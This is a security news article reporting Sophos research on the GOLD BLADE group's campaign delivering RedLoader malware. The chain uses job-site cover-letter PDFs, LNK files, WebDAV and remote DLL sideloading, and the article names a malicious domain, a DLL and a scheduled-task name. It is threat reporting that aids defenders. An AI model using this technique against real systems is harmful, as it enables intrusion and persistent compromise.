Threat Actors Weaponizes LNK Files to Deploy RedLoader Malware on Windows Systems

The cybersecurity landscape faces a renewed threat as the GOLD BLADE cybercriminal group has significantly evolved their attack methodology, combining previously observed techniques to create a sophisticated infection chain.

This new campaign, which surged in July 2025, leverages malicious LNK files paired with a recycled WebDAV technique to deploy their custom RedLoader malware on Windows systems.

The threat represents a concerning escalation in the group’s capabilities, demonstrating how established threat actors continuously adapt their tactics to evade detection and maximize infection success rates.

The attack begins with a deceptively simple social engineering approach, where threat actors distribute well-crafted cover letter PDFs through legitimate third-party job sites such as Indeed.com.

These documents contain malicious links that automatically download ZIP archives to victims’ systems, initiating a complex multi-stage infection process.

The sophistication lies not in the initial delivery mechanism, but in the subsequent execution chain that combines legitimate system processes with malicious payloads to establish persistent access while remaining largely undetected by traditional security measures.

Sophos analysts identified this new infection chain while investigating the GOLD BLADE group’s evolving tactics, noting that while the individual components had been observed separately in previous campaigns, their combination represents an unprecedented approach to initial system compromise.

The researchers observed that the group previously utilized WebDAV techniques for remote DLL execution in September 2024 and DLL sideloading methods in March 2025, but the July 2025 campaign marks the first documented instance of these techniques being orchestrated together.

Remote DLL Sideloading: A Technical Deep Dive

The most technically sophisticated aspect of this campaign involves the remote DLL sideloading mechanism that serves as the foundation for RedLoader deployment.

Once the LNK file executes, it triggers conhost.exe to establish a WebDAV connection with the CloudFlare-hosted domain automatinghrservices[.]workers[.]dev.

The malicious infrastructure hosts a renamed version of Adobe’s legitimate ADNotificationManager.exe executable, which masquerades as a resume document to maintain the social engineering pretense.

The critical technical innovation lies in the remote sideloading process, where the legitimate executable automatically loads the malicious netutils.dll file from the same remote directory.

This approach creates a legitimate signed executable that loads malicious code without triggering typical security alerts.

RedLoader stage 1 then establishes persistence through a scheduled task named BrowserQEBrowserQE_, demonstrating the malware’s capability to create victim-specific identifiers while maintaining consistent operational signatures across different compromised systems.

Integrate ANY.RUN TI Lookup with your SIEM or SOAR To Analyses Advanced Threats -> Try 50 Free Trial Searches